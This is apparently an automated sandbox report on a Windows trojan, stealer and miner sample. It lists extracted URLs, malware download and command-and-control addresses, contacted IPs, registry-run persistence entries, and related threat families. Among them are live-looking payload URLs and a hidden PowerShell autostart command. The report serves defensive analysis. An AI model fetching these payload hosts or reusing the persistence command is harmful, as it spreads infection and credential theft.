https://curl.se/docs/alt-svc.html	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
https://xmrig.com/wizard	Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	false	high
http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174	d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000001087000.00000040.00000001.01000000.00000013.sdmp	false	high
http://185.156.73.23/soft/download&%	d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://httpbin.org/ipbefore	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt	9434b989db.exe, 00000030.00000003.4037665707.000000000B7A8000.00000004.00000020.00020000.00000000.sdmp	false	high
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	c359af6492.exe.14.dr	false	high
https://g-cleanit.hk	d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000585D000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868146778.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864248822.000000000595C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3868658111.00000000059A2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869728348.000000000595F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3863773219.000000000569F000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3869516834.0000000005A31000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/jBpk9	ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.156.73.23/files/download	d5cd5e4aa8.exe, 0000002E.00000003.3608285796.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.156.73.23/dll/key	d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.16/off/def.exe	ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat:443/api	ea17d0b77a.exe, 0000002F.00000003.3475247118.00000000010E8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta	ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	false	high
http://html4/loose.dtd	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
http://185.215.113.206/68b591d6548ec281/vcruntime140.dll	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://ocsp.sectigo.com0	c359af6492.exe.14.dr	false	high
http://185.215.113.16/mine/random.exe	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.16/mine/random.exeT	9434b989db.exe, 00000030.00000002.4214117571.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/api	ea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421003760.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.000000000108C000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3464019441.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3474594016.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3421454526.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3314582270.0000000005989000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.000000000598C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3390597746.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3358345765.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3422664576.0000000005996000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3396433955.0000000005992000.00000004.00000800.00020000.00000000.sdmp	false	high
http://185.215.113.206/68b591d6548ec281/sqlite3.dll	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://.css	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg	ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	false	high
http://185.215.113.206c4becf79229cb002.phpge	9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmp	false	unknown
https://discokeyus.lat/=G	ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.206/c4becf79229cb002.phpx	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.16/aMoh	ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0	c359af6492.exe.14.dr	false	high
http://185.156.73.23/files/download=%Z	d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://x1.c.lencr.org/0	ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://x1.i.lencr.org/0	ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.206/68b591d6548ec281/mozglue.dll	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	high
https://support.mozilla.org/products/firefoxgro.all	ea17d0b77a.exe, 0000002F.00000003.3358748084.0000000005AAC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://.jpg	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
http://crl.micro8	ea17d0b77a.exe, 0000002F.00000003.3503997226.00000000010DF000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.mozilla.or	ea17d0b77a.exe, 0000002F.00000003.3358203921.00000000059B8000.00000004.00000800.00020000.00000000.sdmp	false	high
http://185.156.73.23/dll/keybnZ	d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.206/68b591d6548ec281/nss3.dll5G	9434b989db.exe, 00000030.00000002.4214117571.00000000007CF000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.215.113.206/c4becf79229cb002.phpge	9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp	false	high
https://sectigo.com/CPS0	c359af6492.exe.14.dr	false	high
http://185.156.73.23/files/download(ho	d5cd5e4aa8.exe, 0000002E.00000003.3718296864.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3780362783.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
https://curl.se/docs/http-cookies.html	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.	ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	false	high
http://185.215.113.206/68b591d6548ec281/msvcp140.dll	9434b989db.exe, 00000030.00000002.4214117571.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	false	high
https://xmrig.com/wizard%s	Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	false	high
http://185.215.113.16/steam/random.exe	ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.156.73.23/add?substr=mixtwo&s=three&sub=empaK	d5cd5e4aa8.exe, 0000002E.00000002.4041357716.00000000055E0000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://185.156.73.23/soft/download	d5cd5e4aa8.exe, 0000002E.00000002.4041645751.000000000567C000.00000004.00000020.00020000.00000000.sdmp, d5cd5e4aa8.exe, 0000002E.00000003.3864020294.000000000595C000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.16/steam/random.exe:	ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_	ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	false	high
https://httpbin.org/ip	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	high
http://185.215.113.16/VB	ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://ac.ecosia.org/autocomplete?q=	ea17d0b77a.exe, 0000002F.00000003.3289351345.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3288988344.00000000059CE000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3289219383.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000003.3524665677.0000000000827000.00000004.00000020.00020000.00000000.sdmp	false	high
http://185.215.113.16/	ea17d0b77a.exe, 0000002F.00000003.3627075029.00000000010F5000.00000004.00000020.00020000.00000000.sdmp	false	high
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	false	high
http://185.156.73.23/dll/download	d5cd5e4aa8.exe, 0000002E.00000002.4018413567.0000000000F54000.00000004.00000020.00020000.00000000.sdmp	false	high
https://discokeyus.lat/	ea17d0b77a.exe, 0000002F.00000003.3355323768.0000000005987000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3356315250.0000000005999000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3387431025.000000000599A000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3538247582.000000000599D000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3537566773.00000000010F6000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355441716.000000000598F000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3355493240.0000000005997000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504377940.000000000599C000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3533335417.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3504078369.0000000005990000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3539294349.0000000001072000.00000004.00000020.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3471828382.00000000010F6000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3	ea17d0b77a.exe, 0000002F.00000003.3361781382.0000000005992000.00000004.00000800.00020000.00000000.sdmp, ea17d0b77a.exe, 0000002F.00000003.3361839462.0000000005998000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	ea17d0b77a.exe, 0000002F.00000003.3356767068.00000000059BC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://xmrig.com/docs/algorithms	Intel_PTT_EK_Recertification.exe, 00000027.00000003.3021212700.000002804F500000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000028.00000002.3027829379.00000001402DD000.00000002.00000001.00020000.00000000.sdmp	false	high
http://usbtor.ru/viewtopic.php?t=798)Z	c359af6492.exe, 00000010.00000000.2914213620.0000000000423000.00000002.00000001.01000000.0000000B.sdmp, c359af6492.exe.14.dr	false	high
http://185.215.113.206	9434b989db.exe, 00000030.00000002.4214117571.000000000075E000.00000004.00000020.00020000.00000000.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FA4000.00000040.00000001.01000000.00000013.sdmp, 9434b989db.exe, 00000030.00000002.4222202528.0000000000FEC000.00000040.00000001.01000000.00000013.sdmp	false	high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850	352def4414.exe, 0000002D.00000003.3055975665.0000000007180000.00000004.00001000.00020000.00000000.sdmp	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.121.15.192	unknown	Spain	207046	REDSERVICIOES	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
34.226.108.155	unknown	United States	14618	AMAZON-AESUS	false
185.156.73.23	unknown	Russian Federation	48817	RELDAS-NETRU	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
172.67.197.170	unknown	United States	13335	CLOUDFLARENETUS	false
31.41.244.11	unknown	Russian Federation	61974	AEROEXPRESS-ASRU	false
127.1.10.1	unknown	unknown	unknown	unknown	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579075
Start date and time:	2024-12-20 19:11:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 19m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@84/46@0/11
EGA Information:	Successful, ratio: 57.1%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Max analysis timeout: 600s exceeded, the analysis took too long
Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
Execution Graph export aborted for target explorer.exe, PID 6432 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Skipping network analysis since amount of network traffic is too extensive
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
13:13:01	API Interceptor	11020453x Sleep call for process: skotes.exe modified
13:13:30	API Interceptor	15x Sleep call for process: powershell.exe modified
13:13:48	API Interceptor	98x Sleep call for process: ea17d0b77a.exe modified
13:13:53	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exe C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe
13:14:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9434b989db.exe C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe
13:14:03	API Interceptor	930230x Sleep call for process: 352def4414.exe modified
13:14:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exe C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe
13:14:12	API Interceptor	113367x Sleep call for process: d5cd5e4aa8.exe modified
13:14:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exe C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe
13:14:28	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ea17d0b77a.exe C:\Users\user\AppData\Local\Temp\1018749001\ea17d0b77a.exe
13:14:30	API Interceptor	228996x Sleep call for process: 9434b989db.exe modified
13:14:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9434b989db.exe C:\Users\user\AppData\Local\Temp\1018750001\9434b989db.exe
13:14:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 0a99277d48.exe C:\Users\user\AppData\Local\Temp\1018751001\0a99277d48.exe
13:14:54	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ceb22082b1.exe C:\Users\user\AppData\Local\Temp\1018752001\ceb22082b1.exe
13:16:54	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 6e9935f194.exe C:\Users\user\AppData\Local\Temp\1018766001\6e9935f194.exe
13:17:02	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 44a5f32284.exe C:\Users\user\AppData\Local\Temp\1018767001\44a5f32284.exe
13:17:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9d2433b964.exe C:\Users\user\AppData\Local\Temp\1018768001\9d2433b964.exe
13:17:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 903f701d4b.exe C:\Users\user\AppData\Local\Temp\1018769001\903f701d4b.exe
13:17:28	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run IEUpdate powershell -ex bypass -w hidden
13:17:36	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 6e9935f194.exe C:\Users\user\AppData\Local\Temp\1018766001\6e9935f194.exe
13:17:45	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 44a5f32284.exe C:\Users\user\AppData\Local\Temp\1018767001\44a5f32284.exe
13:17:53	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9d2433b964.exe C:\Users\user\AppData\Local\Temp\1018768001\9d2433b964.exe
13:18:01	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 903f701d4b.exe C:\Users\user\AppData\Local\Temp\1018769001\903f701d4b.exe
13:18:10	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run IEUpdate powershell -ex bypass -w hidden
19:12:11	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
19:13:27	Task Scheduler	Run new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
19:15:47	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, SystemBC, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	1QNOKwVoOT.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	R2CgZG545D.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	185.215.113.43/Zu7JuNko/index.php
	UyiH4t5dph.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	185.215.113.43/Zu7JuNko/index.php
185.121.15.192	t3VyxF5MmA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
	Pm81aa8zii.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
	avBx6p1FAX.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
	j6Nv9kUydV.exe	Get hash	malicious	Unknown	Browse	home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
	28PCC9oa8s.exe	Get hash	malicious	Unknown	Browse	home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
	HHFgVU1HGu.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
	GxSEtDSBuK.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745
	iuO4kwUi17.exe	Get hash	malicious	Unknown	Browse	home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
	nojxbVm8i4.exe	Get hash	malicious	Cryptbot	Browse	home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
	QnYodX3dYf.exe	Get hash	malicious	Cryptbot	Browse	home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	104.20.3.235
	https://tekascend.com/Ray-verify.html	Get hash	malicious	NetSupport RAT	Browse	1.1.1.1
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	104.20.22.46
